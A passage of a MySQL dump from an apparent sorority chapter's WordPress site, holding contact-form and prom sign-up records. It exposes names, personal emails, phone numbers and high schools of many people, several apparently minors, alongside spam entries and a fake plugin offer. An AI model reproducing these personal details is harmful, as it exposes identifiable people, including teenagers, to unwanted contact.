11:57:06',0,0,'5.188.48.10','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4093.3 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(502,7,NULL,'2021-08-28 18:34:55',0,0,'46.235.70.142','https://zphiblgz.org/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL);
/*!40000 ALTER TABLE `lwz_rg_lead` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_lead_detail`
--

DROP TABLE IF EXISTS `lwz_rg_lead_detail`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_lead_detail` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `lead_id` int(10) unsigned NOT NULL,
  `form_id` mediumint(8) unsigned NOT NULL,
  `field_number` float NOT NULL,
  `value` longtext,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `lead_id` (`lead_id`),
  KEY `lead_field_number` (`lead_id`,`field_number`),
  KEY `lead_field_value` (`value`(191))
) ENGINE=MyISAM AUTO_INCREMENT=5655 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_lead_detail`
--

LOCK TABLES `lwz_rg_lead_detail` WRITE;
/*!40000 ALTER TABLE `lwz_rg_lead_detail` DISABLE KEYS */;
INSERT INTO `lwz_rg_lead_detail` VALUES (1,1,1,1.3,'Pamela'),(2,1,1,1.6,'Sumah'),(3,1,1,2,'Pamela.sumah.06@gmail.com'),(4,1,1,3,'Good Morning,\r\n\r\nMy name is Pamela Sumah and I am interested in finding out more about LGZ. I currently reside and work in Howard County, and looking to get involved in a chapter that is closer than my initiating chapter Beta Zeta in DC.\r\n\r\nI may be contacted either by email pamela.sumah.06@gmail.com or phone at 301.807.3744.\r\n\r\nI look forward to hearing from you and finding out more about the chapter.\r\n\r\nWith Sisterly Love,\r\n\r\nPamela'),(5,2,1,1.3,'Jen'),(6,2,1,1.6,'Williams'),(7,2,1,2,'Jenniferb.willliams87@gmail.com'),(8,2,1,3,'Hello I was interested in joining a graduate chapter of your organization. I look forward to be hearing from you. Thank you'),(9,3,1,1.3,'Wordpress Community'),(10,3,1,1.6,'Wordpress Community'),(11,3,1,2,'dyhdjvhagsu@wordpress.org'),(12,3,1,3,'You have been chosen by WordPress community to try out our new All in One SEO Pack Pro v2.1. For further information please click on the following link where you can also find the download link http://www.wordpresscommunity.net/all-in-one-seo-pack/\r\nWordpress Community http://www.wordpresscommunity.net'),(13,4,2,1.3,'Cherice'),(14,4,2,1.6,'Daniel'),(15,4,2,4,'Western'),(16,4,2,5,'9'),(17,4,2,6,'4'),(18,4,2,7,'N/A'),(20,5,2,1.3,'Cherice'),(21,5,2,1.6,'Daniel'),(22,5,2,3,'(410)531-9527'),(23,5,2,4,'Western'),(24,5,2,5,'9'),(25,5,2,6,'N/A'),(26,5,2,7,'N/A'),(28,6,1,1.3,'Maliek'),(29,6,1,1.6,'van Laar'),(30,6,1,2,'maliekvanlaar@gmail.com'),(32,6,1,5,'Reclaim'),(33,6,1,3,'Good day,\r\n\r\nI am inquiring about your next chapter meeting to visit with myself and another Soror seeking a new home. \r\n\r\nThank you in advance.\r\n\r\nMaliek van Laar\r\n202-413-2315'),(34,7,1,1.3,'Denise'),(35,7,1,1.6,'Wilmot Roberts'),(36,7,1,2,'Denisewroberts@gmail.com'),(38,7,1,5,'Graduate'),(39,7,1,3,'I am interested in pursing membership into this sisterhood. I would love more information about the requirements needs to become a member. \r\n\r\nLooking forward to hearing from you,\r\n\r\nDenise'),(40,8,2,1.3,'Kathy'),(41,8,2,1.6,'Barrett'),(42,8,2,2,'kjbarrett3@Verizon.net'),(43,8,2,4,'howard'),(44,8,2,5,'12'),(45,8,2,6,'4'),(46,8,2,7,'N/A'),(48,9,1,1.3,'cwmjbv@foehry.com'),(49,9,1,1.6,'cwmjbv@foehry.com'),(50,9,1,2,'cwmjbv@foehry.com'),(52,9,1,5,'Reclaim'),(53,9,1,3,'mr7maf  njclhmlmozub, [url=http://nsnlqxrymlex.com/]nsnlqxrymlex[/url], [link=http://azyuscbnzmgy.com/]azyuscbnzmgy[/link], http://tlzqraeldtcd.com/'),(54,10,2,1.3,'Kofi'),(55,10,2,1.6,'Agyemang'),(56,10,2,2,'brooxz@mail.com'),(57,10,2,3,'(410)379-8154'),(58,10,2,4,'Long Reach High School'),(59,10,2,5,'10'),(60,10,2,6,'N/A'),(61,10,2,7,'Medium'),(63,11,2,1.3,'Seniya'),(64,11,2,1.6,'Lee'),(65,11,2,2,'ninibailey07@gmail.com'),(66,11,2,3,'(240)755-3491'),(67,11,2,4,'oakland mills high school'),(68,11,2,5,'12'),(69,11,2,6,'8'),(70,11,2,7,'N/A'),(72,12,2,1.3,'Brittany'),(73,12,2,1.6,'Johnson'),(74,12,2,2,'binnyjohnson11@gmail.com'),(75,12,2,3,'(410)793-6381'),(76,12,2,4,'Wilde Lake'),(77,12,2,5,'12'),(78,12,2,6,'10'),(79,12,2,7,'Medium'),(81,13,2,1.3,'Taj'),(82,13,2,1.6,'Lewis'),(83,13,2,2,'sheis12324@yahoo.com'),(84,13,2,3,'(301)800-5692'),(85,13,2,4,'Homewood- going to Howard\'s prom'),(86,13,2,5,'12'),(87,13,2,6,'8'),(88,13,2,7,'N/A'),(90,14,2,1.3,'Taylor'),(91,14,2,1.6,'Williams'),(92,14,2,2,'tayy_williams97@yahoo.com'),(93,14,2,3,'(301)775-9556'),(94,14,2,4,'Atholton High School'),(95,14,2,5,'11'),(96,14,2,6,'N/A'),(97,14,2,7,'N/A'),(99,15,2,1.3,'Anthony'),(100,15,2,1.6,'Hayes'),(101,15,2,2,'321absolutezero@gmail.com'),(102,15,2,3,'(410)300-6485'),(103,15,2,4,'Oakland Mills High School'),(104,15,2,5,'12'),(105,15,2,6,'N/A'),(106,15,2,7,'Medium'),(108,16,2,1.3,'Re\'Nisha'),(109,16,2,1.6,'Tann'),(110,16,2,2,'rtann1204@gmail.com'),(111,16,2,3,'(240)421-4821'),(112,16,2,4,'Homewood but going to Hammond\'s Prom'),(113,16,2,5,'12'),(114,16,2,6,'12'),(115,16,2,7,'N/A'),(117,17,2,1.3,'juny'),(118,17,2,1.6,'gonzalez'),(119,17,2,2,'junygonzalez123@gmail.com'),(120,17,2,3,'(301)820-8532'),(121,17,2,4,'glenelg'),(122,17,2,5,'12'),(123,17,2,6,'N/A'),(124,17,2,7,'Medium'),(126,18,2,1.3,'Reema'),(127,18,2,1.6,'Halboni'),(128,18,2,2,'r33maluvsu@yahoo.com'),(129,18,2,3,'(443)554-6895'),(130,18,2,4,'Marriotts Ridge High School'),(131,18,2,5,'12'),(132,18,2,6,'4'),(133,18,2,7,'N/A'),(135,19,2,1.3,'Anthony'),(136,19,2,1.6,'Ahumada'),(137,19,2,2,'anthonyam14@ymail.com'),(138,19,2,3,'(410)381-4558'),(139,19,2,4,'Oakland Mills High School'),(140,19,2,5,'12'),(141,19,2,6,'N/A'),(142,19,2,7,'Small'),(144,20,2,1.3,'Zoya'),(145,20,2,1.6,'Malik'),(146,20,2,2,'ziniakitty@gmail.com'),(147,20,2,3,'(443)283-0356'),(148,20,2,4,'River Hill High School'),(149,20,2,5,'12'),(150,20,2,6,'8'),(151,20,2,7,'N/A'),(153,21,2,1.3,'Jasmine'),(154,21,2,1.6,'Sullivan'),(155,21,2,2,'jassyjasxoxo@aim.com'),(156,21,2,3,'(443)474-8197'),(157,21,2,4,'Marriotts Ridge High School'),(158,21,2,5,'12'),(159,21,2,6,'4'),(160,21,2,7,'N/A'),(162,22,2,1.3,'Ben'),(163,22,2,1.6,'Bartch'),(164,22,2,2,'bdbartch@gmail.com'),(165,22,2,4,'Marriotts Ridge High School'),(166,22,2,5,'12'),(167,22,2,6,'N/A'),(168,22,2,7,'Large'),(170,23,2,1.3,'Rami'),(171,23,2,1.6,'Halboni'),(172,23,2,2,'rhalboni12@gmail.com'),(173,23,2,3,'(443)360-2007'),(174,23,2,4,'Marriotts Ridge High School'),(175,23,2,5,'12'),(176,23,2,6,'N/A'),(177,23,2,7,'Large'),(179,24,2,1.3,'Sixu'),(180,24,2,1.6,'Chen'),(181,24,2,2,'sixuchen6@gmail.com'),(182,24,2,3,'(443)758-5236'),(183,24,2,4,'Mount Hebron High School'),(184,24,2,5,'12'),(185,24,2,6,'N/A'),(186,24,2,7,'N/A'),(188,25,2,1.3,'Emmanuel'),(189,25,2,1.6,'Twumasi'),(190,25,2,2,'emmattegh@yahoo.com'),(191,25,2,3,'(443)345-6086'),(192,25,2,4,'Wilde Lake High School'),(193,25,2,5,'12'),(194,25,2,6,'N/A'),(195,25,2,7,'Small'),(197,26,2,1.3,'Fatou'),(198,26,2,1.6,'Gaye'),(199,26,2,2,'starfire.gaye@gmail.com'),(200,26,2,3,'(443)453-4868'),(201,26,2,4,'Mt. Hebron High School'),(202,26,2,5,'12'),(203,26,2,6,'12'),(204,26,2,7,'N/A'),(206,27,2,1.3,'Allyson'),(207,27,2,1.6,'Christ'),(208,27,2,2,'Allysonchrist@gmail.com'),(209,27,2,3,'(443)561-5105'),(210,27,2,4,'Mt.hebron'),(211,27,2,5,'12'),(212,27,2,6,'N/A'),(213,27,2,7,'N/A'),(215,28,2,1.3,'Kalonji'),(216,28,2,1.6,'Moore'),(217,28,2,2,'moore3k@gmail.com'),(218,28,2,3,'(410)660-8485'),(219,28,2,4,'River Hill'),(220,28,2,5,'12'),(221,28,2,6,'N/A'),(222,28,2,7,'Large'),(224,29,2,1.3,'Kalonji'),(225,29,2,1.6,'Moore'),(226,29,2,2,'moore3k@gmail.com'),(227,29,2,3,'(410)660-8485'),(228,29,2,4,'River Hill'),(229,29,2,5,'12'),(230,29,2,6,'N/A'),(231,29,2,7,'Large'),(233,30,2,1.3,'Amoni'),(234,30,2,1.6,'Willett'),(235,30,2,2,'amanie1996@gmail.com'),(236,30,2,3,'(301)300-6673'),(237,30,2,4,'Hammond High School'),(238,30,2,5,'12'),(239,30,2,6,'16'),(240,30,2,7,'N/A'),(242,31,2,1.3,'Keyla'),(243,31,2,1.6,'Dematos'),(244,31,2,2,'Kmrdematos5808@hotmail.com'),(245,31,2,3,'(443)462-0553'),(246,31,2,4,'Long reach high school'),(247,31,2,5,'12'),(248,31,2,6,'4'),(249,31,2,7,'N/A'),(251,32,2,1.3,'Anna'),(252,32,2,1.6,'Milyaeva'),(253,32,2,2,'amilya129@gmail.com'),(254,32,2,3,'(443)617-7789'),(255,32,2,4,'Atholton High School'),(256,32,2,5,'12'),(257,32,2,6,'4'),(258,32,2,7,'N/A'),(260,33,2,1.3,'Sharzad'),(261,33,2,1.6,'Poushangi'),(262,33,2,2,'sharzadxo@yahoo.com'),(263,33,2,3,'(410)733-7315'),(264,33,2,4,'Marriotts Ridge'),(265,33,2,5,'12'),(266,33,2,6,'0'),(267,33,2,7,'N/A'),(269,34,2,1.3,'Rekem'),(270,34,2,1.6,'Vaughn'),(271,34,2,2,'rekcyvaughn@gmail.com'),(272,34,2,3,'(410)818-7472'),(273,34,2,4,'River Hill High School'),(274,34,2,5,'12'),(275,34,2,6,'N/A'),(276,34,2,7,'Large'),(278,35,2,1.3,'Jade'),(279,35,2,1.6,'O\'Neal'),(280,35,2,2,'Jaynealz22@yahoo.com'),(281,35,2,3,'(917)659-2225'),(282,35,2,4,'Atholton High School'),(283,35,2,5,'12'),(284,35,2,6,'N/A'),(285,35,2,7,'Medium'),(287,36,2,1.3,'Sokphea'),(288,36,2,1.6,'Pheav'),(289,36,2,2,'sokphea123@gmail.com'),(290,36,2,3,'(757)352-8775'),(291,36,2,4,'River Hill High School'),(292,36,2,5,'12'),(293,36,2,6,'8'),(294,36,2,7,'N/A'),(296,37,2,1.3,'Onyi'),(297,37,2,1.6,'Ihebereme'),(298,37,2,2,'onyi.ninie@gmail.com'),(299,37,2,3,'(301)659-9591'),(300,37,2,4,'Long Reach High School'),(301,37,2,5,'12'),(302,37,2,6,'2'),(303,37,2,7,'Small'),(305,38,2,1.3,'jade'),(306,38,2,1.6,'oneal'),(307,38,2,2,'jade.onealfmhs@gmail.com'),(308,38,2,3,'(917)838-9663'),(309,38,2,4,'Atholton'),(310,38,2,5,'12'),(311,38,2,6,'14'),(312,38,2,7,'N/A'),(314,39,1,1.3,'Kazandra'),(315,39,1,1.6,'Anderson'),(316,39,1,2,'kazandra_anderson@hcpss.org'),(318,39,1,5,'Other'),(319,39,1,3,'I am a social worker that is the program coordinator for Howard County Public Schools Teen Parent Program. I wanted to find out if I could get some invitations for your \"pretty and polished affair\". I have several teen moms who are seniors in high school that could benefit from this program. Any information would be greatly appreciated.'),(320,40,2,1.3,'Jairo'),(321,40,2,1.6,'Suarez'),(322,40,2,2,'jairoyzs@yahoo.com'),(323,40,2,3,'(443)472-3998'),(324,40,2,4,'Wilde lake High School'),(325,40,2,5,'12'),(326,40,2,6,'N/A'),(327,40,2,7,'Medium'),(329,41,2,1.3,'Daniel'),(330,41,2,1.6,'Odom'),(331,41,2,2,'dizzyfresh41@gmail.com'),(332,41,2,3,'(301)957-1602'),(333,41,2,4,'Reservoir High School'),(334,41,2,5,'12'),(335,41,2,6,'N/A'),(336,41,2,7,'XL'),(338,42,2,1.3,'Imani'),(339,42,2,1.6,'Clayton'),(340,42,2,2,'isavannah96@aol.com'),(341,42,2,3,'(240)351-6483'),(342,42,2,4,'Reservoir High School'),(343,42,2,5,'12'),(344,42,2,6,'12'),(345,42,2,7,'N/A'),(347,43,2,1.3,'Hartford'),(348,43,2,1.6,'Jennings III'),(349,43,2,2,'tre@gmail.com'),(350,43,2,4,'Howard High'),(351,43,2,5,'12'),(352,43,2,6,'N/A'),(353,43,2,7,'Medium'),(355,44,2,1.3,'Amy'),(356,44,2,1.6,'Huang'),(357,44,2,2,'huang.hellokitty64@gmail.com'),(358,44,2,3,'(443)570-5433'),(359,44,2,4,'River Hill'),(360,44,2,5,'12'),(361,44,2,6,'2'),(362,44,2,7,'N/A'),(364,45,2,1.3,'Fatimat'),(365,45,2,1.6,'Adekola'),(366,45,2,2,'d.adekola@yahoo.com'),(367,45,2,3,'(301)776-3616'),(368,45,2,4,'Reservoir High School'),(369,45,2,5,'12'),(370,45,2,6,'14'),(371,45,2,7,'N/A'),(373,46,2,1.3,'Jane'),(374,46,2,1.6,'Yi'),(375,46,2,4,'Hammond High School'),(376,46,2,5,'12'),(377,46,2,6,'N/A'),(378,46,2,7,'N/A'),(380,47,2,1.3,'Daniel'),(381,47,2,1.6,'Owens'),(382,47,2,2,'Owens.daniel410@Yahoo.com'),(383,47,2,3,'(240)406-9741'),(384,47,2,4,'Wilde Lake'),(385,47,2,5,'12'),(386,47,2,6,'6'),(387,47,2,7,'Large'),(389,48,2,1.3,'Daniel'),(390,48,2,1.6,'Owens'),(391,48,2,2,'Owens.daniel410@Yahoo.com'),(392,48,2,3,'(240)406-9741'),(393,48,2,4,'Wilde Lake'),(394,48,2,5,'12'),(395,48,2,6,'6'),(396,48,2,7,'Large'),(398,49,2,1.3,'jael'),(399,49,2,1.6,'delarosa'),(400,49,2,2,'estefaniadelarosa12113@hotmail.com'),(401,49,2,3,'(240)898-5026'),(402,49,2,4,'homewood going to oakland mills prom'),(403,49,2,5,'12'),(404,49,2,6,'12'),(405,49,2,7,'N/A'),(407,50,2,1.3,'Tyra'),(408,50,2,1.6,'Jackson'),(409,50,2,2,'tyraj443@gmail.com'),(410,50,2,3,'(301)385-6544'),(411,50,2,4,'Reservoir High School'),(412,50,2,5,'12'),(413,50,2,6,'12'),(414,50,2,7,'N/A'),(416,51,2,1.3,'mashai'),(417,51,2,1.6,'small'),(418,51,2,2,'mashaismall@rocketmail.com'),(419,51,2,3,'(301)256-6909'),(420,51,2,4,'Hammond High School'),(421,51,2,5,'12'),(422,51,2,6,'4'),(423,51,2,7,'N/A'),(425,52,2,1.3,'Sindia'),(426,52,2,1.6,'Gomez'),(427,52,2,2,'gabby_gomez_24@yahoo.com'),(428,52,2,3,'(410)698-8129'),(429,52,2,4,'Long Reach'),(430,52,2,5,'12'),(431,52,2,6,'0'),(432,52,2,7,'Small'),(434,53,2,1.3,'Eunice'),(435,53,2,1.6,'Jung'),(436,53,2,2,'ejung617@gmail.com'),(437,53,2,3,'(301)538-3851'),(438,53,2,4,'hammond high school'),(439,53,2,5,'12'),(440,53,2,6,'0'),(441,53,2,7,'N/A'),(443,54,2,1.3,'Belrie'),(444,54,2,1.6,'Wilson'),(445,54,2,2,'wbelrie@gmail.com'),(446,54,2,3,'(443)864-5273'),(447,54,2,4,'Homewood- going to wilde lake prom'),(448,54,2,5,'12'),(449,54,2,6,'N/A'),(450,54,2,7,'Medium'),(452,55,2,1.3,'Jesula'),(453,55,2,1.6,'Fleurizard'),(454,55,2,2,'explosion99@rocketmail.com'),(455,55,2,3,'(443)538-1561'),(456,55,2,4,'Wilde Lake High School'),(457,55,2,5,'12'),(458,55,2,6,'6'),(459,55,2,7,'N/A'),(461,56,2,1.3,'Alisa'),(462,56,2,1.6,'Ellerbe'),(463,56,2,2,'alisa.green18@gmail.com'),(464,56,2,3,'(443)622-6931'),(465,56,2,4,'Wilde lake high school'),(466,56,2,5,'12'),(467,56,2,6,'10'),(468,56,2,7,'N/A'),(470,57,2,1.3,'Gabrielle'),(471,57,2,1.6,'Christian'),(472,57,2,2,'gabchrstn@gmail.com'),(473,57,2,3,'(443)545-4473'),(474,57,2,4,'Wilde Lake'),(475,57,2,5,'12'),(476,57,2,6,'N/A'),(477,57,2,7,'N/A'),(479,58,2,1.3,'Sindia'),(480,58,2,1.6,'Gomez'),(481,58,2,2,'gabby_gomez_24@yahoo.com'),(482,58,2,3,'(410)698-8129'),(483,58,2,4,'Long Reach'),(484,58,2,5,'12'),(485,58,2,6,'0'),(486,58,2,7,'Small'),(488,59,2,1.3,'Monica'),(489,59,2,1.6,'Cruz'),(490,59,2,2,'moncruz6493@yahoo.com'),(491,59,2,3,'(301)768-5774'),(492,59,2,4,'Reservoir High School'),(493,59,2,5,'12'),(494,59,2,6,'18'),(495,59,2,7,'N/A'),(497,60,2,1.3,'Aristide'),(498,60,2,1.6,'Manga'),(499,60,2,2,'aristidem5@gmail.com'),(500,60,2,3,'(443)805-8487'),(501,60,2,4,'Wilde Lake High School'),(502,60,2,5,'12'),(503,60,2,6,'N/A'),(504,60,2,7,'Medium'),(506,61,2,1.3,'YASMINE'),(507,61,2,1.6,'JACKSON'),(508,61,2,2,'YASMINE695@YAHOO.COM'),(509,61,2,3,'(410)997-0729'),(510,61,2,4,'WILDELAKE HIGH SCHOOL'),(511,61,2,5,'12'),(512,61,2,6,'12'),(513,61,2,7,'N/A'),(515,62,2,1.3,'Jennifer'),(516,62,2,1.6,'Wiseman'),(517,62,2,2,'jwiseman2357@gmail.com'),(518,62,2,3,'(253)503-9156'),(519,62,2,4,'Oakland Mills High School'),(520,62,2,5,'12'),(521,62,2,6,'18'),(522,62,2,7,'N/A'),(524,63,2,1.3,'eva'),(525,63,2,1.6,'mayanja'),(526,63,2,2,'emayanja96@gmail.com'),(527,63,2,3,'(781)839-0681'),(528,63,2,4,'reservoir high school'),(529,63,2,5,'12'),(530,63,2,6,'2'),(531,63,2,7,'N/A'),(533,64,2,1.3,'Naa-Lamiokor'),(534,64,2,1.6,'Lamptey'),(535,64,2,2,'Colorfulnclassy@yahoo.com'),(536,64,2,3,'(443)518-0474'),(537,64,2,4,'Wilde Lake High'),(538,64,2,5,'12'),(539,64,2,6,'10'),(540,64,2,7,'N/A'),(542,65,2,1.3,'michael'),(543,65,2,1.6,'maloney'),(544,65,2,2,'maloneymikey22@gmail.com'),(545,65,2,3,'(240)755-7477'),(546,65,2,4,'reservoir highschool'),(547,65,2,5,'12'),(548,65,2,6,'N/A'),(549,65,2,7,'N/A'),(551,66,2,1.3,'Amber'),(552,66,2,1.6,'Rucker'),(553,66,2,2,'adorableamber28@gmail.com'),(554,66,2,3,'(202)650-1350'),(555,66,2,4,'Wilde Lake High School'),(556,66,2,5,'12'),(557,66,2,6,'N/A'),(558,66,2,7,'N/A'),(560,67,2,1.3,'ERIKA'),(561,67,2,1.6,'BUTLER'),(562,67,2,2,'WINFRED_BUTLER@YAHOO.COM'),(563,67,2,3,'(410)440-6626'),(564,67,2,4,'WILDE LAKE'),(565,67,2,5,'12'),(566,67,2,6,'6'),(567,67,2,7,'N/A'),(569,68,1,1.3,'Brandon'),(570,68,1,1.6,'Barrett'),(571,68,1,2,'BBarrett1906@yahoo.com'),(573,68,1,5,'Other'),(574,68,1,3,'HI My name is Brandon Barrett and I am a member of Alpha Phi Alpha\'s, Kappa Phi Lambda chapter.  I am reaching out to you because I would like to make a donation to the W. Ruth Conway scholarship fund.  How do I go about doing this? \r\n\r\nBBarrett1906@yahoo.com\r\n(410)382-1384\r\n\r\nThank you, \r\n\r\nBrandon Barrett'),(575,69,1,1.3,'Bethany'),(576,69,1,1.6,'Peters'),(577,69,1,2,'bpeters267@gmail.com'),(579,69,1,5,'Reclaim'),(580,69,1,3,'Good Afternoon, \r\n    My name is Bethany Peters and I attend Frostburg State University. I am interested in bringing back the Zetas to our school but I am unaware of the steps I need to take to make this happen. Ever since I was little, I wanted to become a Zeta not only because I believe and agree what the sorority stands for;but also because my mother is a Zeta. I would have the utmost appreciation if you could help me reestablish the Zeta sorority. Thank you for your time and have a great day.'),(581,70,1,1.3,'Karen'),(582,70,1,1.6,'Parham'),(583,70,1,2,'kcparham@aol.com'),(585,70,1,5,'Graduate'),(586,70,1,3,'Hello my name is Karen (Moses) Parham and I became a Zeta Fall of 1989. I pledged undergrad Eta Omicron Zeta/Zeta Lambda Kean College of NJ now Kean University. The last chapter I was with was Gamma Omicron Zeta 1991-1992. I moved to Baltimore in 1997 but never joined a chapter. Please email me or contact me at 443-570-4774. I also contacted the national headquarter regarding reactivation of my membership.\r\n \r\n \r\nThanks'),(587,71,1,1.3,'Ava'),(588,71,1,1.6,'Lawson'),(589,71,1,2,'alawson40@gmail.com'),(591,71,1,5,'Graduate'),(592,71,1,3,'Greetings,\r\n\r\nI am interested in learning more of what is required in becoming a member of Zeta Phi Beta. In addition, I would like more information on how I can now become an active volunteer in helping to serve in your community events..  I currently hold a Bachelors Degree  and after 18 years of a long successful career in Information Technology, I plan to make a career change to Secondary Education/ Higher Ed, and pursue a Master of Fine Arts in Creative Writing & Publishing.  My long passion has been to write and teach all things literature, and I am finally walking in my destiny.   I want to be a part of a strong sisterhood that carries the same passion that I share for educating people of all ages and backgrounds and serving the community with a purpose. \r\n\r\nWarm Regards,\r\n\r\nAva Lawson'),(593,72,1,1.3,'Soror Benity'),(594,72,1,1.6,'Sewell'),(595,72,1,2,'BenitybSewell@yahoo.com'),(597,72,1,5,'Graduate'),(598,72,1,3,'Greetings Soror,\r\nI am interest in attending your chapter meeting.  Please advise as to what time your chapter meetings are held.\r\nI would like to attend in June - Thank you!'),(599,73,1,1.3,'taglap@zbvwvb.com'),(600,73,1,1.6,'taglap@zbvwvb.com'),(601,73,1,2,'taglap@zbvwvb.com'),(603,73,1,5,'Reclaim'),(604,73,1,3,'EghkCR  fjcfyjgxmjki, [url=http://qwaylvytvihv.com/]qwaylvytvihv[/url], [link=http://xzpjocvynbvw.com/]xzpjocvynbvw[/link], http://kjtumfzsnlhi.com/'),(605,74,1,1.3,'Michele'),(606,74,1,1.6,'Franklin'),(607,74,1,2,'ms.michele73@verizon.net'),(609,74,1,5,'Reclaim'),(610,74,1,3,'Greetings Sorors,\r\nI am interested in attending your next chapter meeting. I, along with another Soror, am interested in being reclaimed and would like to find out more information about your chapter. You can also reach me at (410) 655-5626. \r\n\r\nYours Truly,\r\nSoror Michele Franklin'),(611,75,1,1.3,'urzokz@jlsxbk.com'),(612,75,1,1.6,'urzokz@jlsxbk.com'),(613,75,1,2,'urzokz@jlsxbk.com'),(615,75,1,5,'Transfer'),(616,75,1,3,'UemjjH  jyggauyjmhqk, [url=http://airjcsrdilex.com/]airjcsrdilex[/url], [link=http://mwhjohdztvbj.com/]mwhjohdztvbj[/link], http://rgvfyppkqgve.com/'),(617,76,1,1.3,'Cherice'),(618,76,1,1.6,'Daniel'),(619,76,1,2,'cherice.l.daniel@bge.com'),(621,76,1,5,'Other'),(622,76,1,3,'Test 1st Anti Notification of Contact Form from website'),(623,77,1,1.3,'Mary'),(624,77,1,1.6,'Toth'),(625,77,1,2,'mtoth@howardcountymd.gov'),(626,77,1,6,'(410)313-6467'),(627,77,1,5,'Other'),(628,77,1,3,'Call for Entries: Martin Luther King Student Essay contest and Nominations for Living the Dream Award\r\nDear Community Leader:\r\n\r\nI am sending you information on two Calls for Entries: The Martin Luther King Essay Contest for Middle and High School Age Students and the Living the Dream Award, which this year will honor both an individual and an organization that has embodied the legacy of Dr. King in  the Howard County community. We hope you will share this information with your community, families and colleagues. \r\n\r\nWe invite you to nominate candidates for the Living the Dream Award, and we also ask that you spread the word about the Student Essay Contest. Please see details in the attached documents. Cannot attach the documents. Please call asap because the essay deadline is Nov. 5\r\n\r\nPlease direct any questions to Mary Toth, Outreach Coordinator for the MLK Commission at 410-313-6467 or email mtoth@howardcountymd.gov.  I deeply appreciate your help in spreading the word.\r\n\r\nThank you.'),(629,78,1,1.3,'CasSandra'),(630,78,1,1.6,'Dorsey'),(631,78,1,2,'cassandra.dorsey@gsa.gov'),(632,78,1,6,'(240)204-4345'),(633,78,1,5,'Graduate'),(634,78,1,3,'Good morning! I am interested in pursuing memebership in Zeta Phi Beta Sorority, Inc.  I currently have a bachelors degree and I woild love more information please.  Thank you in advance.\r\n\r\n~CasSandra Dorsey'),(635,79,1,1.3,'Cherice'),(636,79,1,1.6,'Daniel'),(637,79,1,2,'cherice.l.daniel@bge.com'),(638,79,1,6,'(410)218-7515'),(639,79,1,5,'Graduate'),(640,79,1,3,'Test to see if Lanette is getting messages. Please email me when you get this message. Thanks, Cherice'),(641,80,1,1.3,'Cherice'),(642,80,1,1.6,'Daniel'),(643,80,1,2,'cherice.l.daniel@bge.com'),(644,80,1,6,'(410)218-7515'),(645,80,1,5,'Graduate'),(646,80,1,3,'Test Message 2'),(647,81,1,1.3,'Cherice'),(648,81,1,1.6,'Daniel'),(649,81,1,2,'cherice.l.daniel@bge.com'),(650,81,1,6,'(410)218-7515'),(651,81,1,5,'Graduate'),(652,81,1,3,'Test 3'),(653,82,1,1.3,'Cherice'),(654,82,1,1.6,'Daniel'),(655,82,1,2,'cherice.l.daniel@bge.com'),(656,82,1,6,'(410)218-7515'),(657,82,1,5,'Graduate'),(658,82,1,3,'Test with first-anti email.'),(659,83,1,1.3,'Sharon'),(660,83,1,1.6,'Middleton'),(661,83,1,2,'sharonmiddleton96@yahoo.com'),(662,83,1,6,'(240)277-8133'),(663,83,1,5,'Graduate'),(664,83,1,3,'Hi my name is Sharon Middleton and I like to join the Lambda Gamma Zeta.  I have a degree in Business Administration.  I live in Howard County.  You stated in order to join you have to meet specific requirements outline by our National headquarters.  I could not find that information, can you please provide that information.\r\n\r\nThanks'),(665,84,2,1.3,'Hannah'),(666,84,2,1.6,'Jaques'),(667,84,2,2,'hannahcjaques@gmail.com'),(668,84,2,3,'(443)699-2046'),(669,84,2,4,'Marriotts Ridge'),(670,84,2,5,'11'),(671,84,2,6,'2'),(672,84,2,7,'N/A'),(673,85,1,1.3,'Lorriane'),(674,85,1,1.6,'Joseph'),(675,85,1,2,'radtech86@hotmail.com'),(676,85,1,6,'(267)977-6284'),(677,85,1,5,'Graduate'),(678,85,1,3,'I am interested in obtaining some additional information about joining the Zeta Phi Beta organization.'),(679,86,1,1.3,'Willie'),(680,86,1,1.6,'Rodney'),(681,86,1,2,'wrodney0507@gmail.com'),(682,86,1,6,'(214) 803-4096'),(683,86,1,5,'Other'),(684,86,1,3,'Hello, \r\nI have a high school senior in Howard County. I was wondering if I could get some information on your W. Ruth Conway Scholarship program.'),(685,87,1,1.3,'Sontia'),(686,87,1,1.6,'daniels'),(687,87,1,2,'jordanmichel23@yahoo.com'),(688,87,1,6,'(716) 578-2282'),(689,87,1,5,'Graduate'),(690,87,1,3,'I am interested in becoming a member of zeta. I been interested for years but relocated from the Buffalo NY area to Columbia MD. Please send me any infor regarding zeta.'),(691,88,1,1.3,'Sontia'),(692,88,1,1.6,'Daniels'),(693,88,1,2,'jordanmichel23@yahoo.com'),(694,88,1,6,'(716) 578-2282'),(695,88,1,5,'Graduate'),(696,88,1,3,'i filled out a form earlier regarding interest but I think it was in the wrong place. I am interested in becoming a zeta. I like doing community service and am currently doing service. But I\'ve had a interest in becoming a zeta for a while. I have tons of friends and family that are blue and white, but when I moved here from buffalo ny I didn\'t pursue it. Now Im in columbia md and I sparked my interest again.'),(697,89,2,1.3,'Tyler'),(698,89,2,1.6,'Bates'),(699,89,2,4,'Reservoir High School'),(700,89,2,5,'12'),(701,89,2,6,'2'),(702,89,2,7,'N/A'),(703,90,2,1.3,'Camila'),(704,90,2,1.6,'Guzman'),(705,90,2,4,'Reservoir High School'),(706,90,2,5,'12'),(707,90,2,6,'8'),(708,90,2,7,'N/A'),(709,91,2,1.3,'Jasmine'),(710,91,2,1.6,'Hood'),(711,91,2,2,'mizzjhood@gmail.com'),(712,91,2,3,'(301) 200-7405'),(713,91,2,4,'Oakland Mills High 